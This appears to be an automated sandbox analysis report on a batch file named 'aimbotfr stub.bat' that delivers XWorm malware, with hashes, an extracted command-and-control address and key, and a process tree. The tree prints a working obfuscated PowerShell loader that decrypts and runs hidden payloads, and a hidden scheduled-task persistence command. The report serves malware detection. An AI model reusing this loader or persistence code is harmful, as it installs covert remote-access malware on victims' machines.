Analysis
-
max time kernel
33s -
max time network
51s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241023-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
14-11-2024 16:11
Static task
static1
Behavioral task
behavioral1
Sample
aimbotfr stub.bat
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
aimbotfr stub.bat
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
aimbotfr stub.bat
Resource
win10ltsc2021-20241023-en
General
-
Target
aimbotfr stub.bat
-
Size
478KB
-
MD5
09c4764995d1f2e96d0a228743f2425e
-
SHA1
0a755c43e147141ec0e9d96d243765af66d1e8a0
-
SHA256
c4db1679718dfb67fb33fcedced456035056f41b68fc071379d27d8bd708e6ab
-
SHA512
856759d72b6fff895d336acb8f86ac82ad8560f5229c1cd12baf25bf6ea9ee80035d364c69c00e66bbe9678f788a635f837032a92d3f08008a8343dcc992ff6e
-
SSDEEP
6144:Y5uDX7kLnB9tGFQe+6YRAFcqLw7DT8ZUXtk9clnD:Yo8LB2FQh64AFcqLw7kZ+uInD
Malware Config
Extracted
xworm
5.0
80.76.49.227:9999
g0vzRORqzebeaKQj
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral3/memory/1800-56-0x000001BE1DB20000-0x000001BE1DB2E000-memory.dmp family_xworm -
Xworm family
-
Blocklisted process makes network request 1 IoCs
flow pid Process 21 1800 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 4404 powershell.exe 1444 powershell.exe 1800 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 4404 powershell.exe 4404 powershell.exe 1444 powershell.exe 1444 powershell.exe 1800 powershell.exe 1800 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4404 powershell.exe Token: SeDebugPrivilege 1444 powershell.exe Token: SeIncreaseQuotaPrivilege 1444 powershell.exe Token: SeSecurityPrivilege 1444 powershell.exe Token: SeTakeOwnershipPrivilege 1444 powershell.exe Token: SeLoadDriverPrivilege 1444 powershell.exe Token: SeSystemProfilePrivilege 1444 powershell.exe Token: SeSystemtimePrivilege 1444 powershell.exe Token: SeProfSingleProcessPrivilege 1444 powershell.exe Token: SeIncBasePriorityPrivilege 1444 powershell.exe Token: SeCreatePagefilePrivilege 1444 powershell.exe Token: SeBackupPrivilege 1444 powershell.exe Token: SeRestorePrivilege 1444 powershell.exe Token: SeShutdownPrivilege 1444 powershell.exe Token: SeDebugPrivilege 1444 powershell.exe Token: SeSystemEnvironmentPrivilege 1444 powershell.exe Token: SeRemoteShutdownPrivilege 1444 powershell.exe Token: SeUndockPrivilege 1444 powershell.exe Token: SeManageVolumePrivilege 1444 powershell.exe Token: 33 1444 powershell.exe Token: 34 1444 powershell.exe Token: 35 1444 powershell.exe Token: 36 1444 powershell.exe Token: SeIncreaseQuotaPrivilege 1444 powershell.exe Token: SeSecurityPrivilege 1444 powershell.exe Token: SeTakeOwnershipPrivilege 1444 powershell.exe Token: SeLoadDriverPrivilege 1444 powershell.exe Token: SeSystemProfilePrivilege 1444 powershell.exe Token: SeSystemtimePrivilege 1444 powershell.exe Token: SeProfSingleProcessPrivilege 1444 powershell.exe Token: SeIncBasePriorityPrivilege 1444 powershell.exe Token: SeCreatePagefilePrivilege 1444 powershell.exe Token: SeBackupPrivilege 1444 powershell.exe Token: SeRestorePrivilege 1444 powershell.exe Token: SeShutdownPrivilege 1444 powershell.exe Token: SeDebugPrivilege 1444 powershell.exe Token: SeSystemEnvironmentPrivilege 1444 powershell.exe Token: SeRemoteShutdownPrivilege 1444 powershell.exe Token: SeUndockPrivilege 1444 powershell.exe Token: SeManageVolumePrivilege 1444 powershell.exe Token: 33 1444 powershell.exe Token: 34 1444 powershell.exe Token: 35 1444 powershell.exe Token: 36 1444 powershell.exe Token: SeIncreaseQuotaPrivilege 1444 powershell.exe Token: SeSecurityPrivilege 1444 powershell.exe Token: SeTakeOwnershipPrivilege 1444 powershell.exe Token: SeLoadDriverPrivilege 1444 powershell.exe Token: SeSystemProfilePrivilege 1444 powershell.exe Token: SeSystemtimePrivilege 1444 powershell.exe Token: SeProfSingleProcessPrivilege 1444 powershell.exe Token: SeIncBasePriorityPrivilege 1444 powershell.exe Token: SeCreatePagefilePrivilege 1444 powershell.exe Token: SeBackupPrivilege 1444 powershell.exe Token: SeRestorePrivilege 1444 powershell.exe Token: SeShutdownPrivilege 1444 powershell.exe Token: SeDebugPrivilege 1444 powershell.exe Token: SeSystemEnvironmentPrivilege 1444 powershell.exe Token: SeRemoteShutdownPrivilege 1444 powershell.exe Token: SeUndockPrivilege 1444 powershell.exe Token: SeManageVolumePrivilege 1444 powershell.exe Token: 33 1444 powershell.exe Token: 34 1444 powershell.exe Token: 35 1444 powershell.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 3728 wrote to memory of 4404 3728 cmd.exe 85 PID 3728 wrote to memory of 4404 3728 cmd.exe 85 PID 4404 wrote to memory of 1444 4404 powershell.exe 87 PID 4404 wrote to memory of 1444 4404 powershell.exe 87 PID 4404 wrote to memory of 4244 4404 powershell.exe 92 PID 4404 wrote to memory of 4244 4404 powershell.exe 92 PID 4244 wrote to memory of 3064 4244 WScript.exe 93 PID 4244 wrote to memory of 3064 4244 WScript.exe 93 PID 3064 wrote to memory of 1800 3064 cmd.exe 95 PID 3064 wrote to memory of 1800 3064 cmd.exe 95
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\aimbotfr stub.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3728 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4pr42IAhLNXaMsLDATuTCXnSN37MkzjWlGCxvlpI204='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mUAA0rhmn7r0Y49Br4h9Tg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $NWFXD=New-Object System.IO.MemoryStream(,$param_var); $TWFke=New-Object System.IO.MemoryStream; $XkRIU=New-Object System.IO.Compression.GZipStream($NWFXD, [IO.Compression.CompressionMode]::Decompress); $XkRIU.CopyTo($TWFke); $XkRIU.Dispose(); $NWFXD.Dispose(); $TWFke.Dispose(); $TWFke.ToArray();}function execute_function($param_var,$param2_var){ $SgoJi=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $obVxl=$SgoJi.EntryPoint; $obVxl.Invoke($null, $param2_var);}$HAian = 'C:\Users\Admin\AppData\Local\Temp\aimbotfr stub.bat';$host.UI.RawUI.WindowTitle = $HAian;$jwIhR=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($HAian).Split([Environment]::NewLine);foreach ($fbsbe in $jwIhR) { if ($fbsbe.StartsWith(':: ')) { $Eaalc=$fbsbe.Substring(3); break; }}$payloads_var=[string[]]$Eaalc.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4404 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_303_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_303.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1444
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_303.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4244 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_303.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:3064 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4pr42IAhLNXaMsLDATuTCXnSN37MkzjWlGCxvlpI204='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mUAA0rhmn7r0Y49Br4h9Tg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $NWFXD=New-Object System.IO.MemoryStream(,$param_var); $TWFke=New-Object System.IO.MemoryStream; $XkRIU=New-Object System.IO.Compression.GZipStream($NWFXD, [IO.Compression.CompressionMode]::Decompress); $XkRIU.CopyTo($TWFke); $XkRIU.Dispose(); $NWFXD.Dispose(); $TWFke.Dispose(); $TWFke.ToArray();}function execute_function($param_var,$param2_var){ $SgoJi=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $obVxl=$SgoJi.EntryPoint; $obVxl.Invoke($null, $param2_var);}$HAian = 'C:\Users\Admin\AppData\Roaming\startup_str_303.bat';$host.UI.RawUI.WindowTitle = $HAian;$jwIhR=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($HAian).Split([Environment]::NewLine);foreach ($fbsbe in $jwIhR) { if ($fbsbe.StartsWith(':: ')) { $Eaalc=$fbsbe.Substring(3); break; }}$payloads_var=[string[]]$Eaalc.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1800
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD53eb3833f769dd890afc295b977eab4b4
SHA1e857649b037939602c72ad003e5d3698695f436f
SHA256c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485
SHA512c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72
-
Filesize
1KB
MD5d5bfa2c6555c439531a00f676c93baaf
SHA11ec5dc4fdfeb986decb07ed0aba3708dab95c51b
SHA2564982ef6cbdc564d8bbe75c01163593e3a4cdd342f0d8d0dd901b4f8e645f2508
SHA512fea0c64e9c167768122a56436b02f1f69756d9a4556d3ab741fefc5f5431ddf2742fc953638a38889f9511437901137b85f68e7447e98bf32ec63e510b3b0fbe
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
115B
MD518e1aa5f6b19f4bb17aa69f978187cc2
SHA127525314d327b925626db48f874cbcb88db98149
SHA2565bf6fdfd088c32b1d18176249570dd226957235669c069dc991eb73c8ea8767d
SHA5129ac70e3a3974a94e5bdf07f80356aa92f8ce44868eb736b946bd157673905bb80440107e994dfca05596de1677a6a311790aa9b5eecc30797bb1456e35021d0c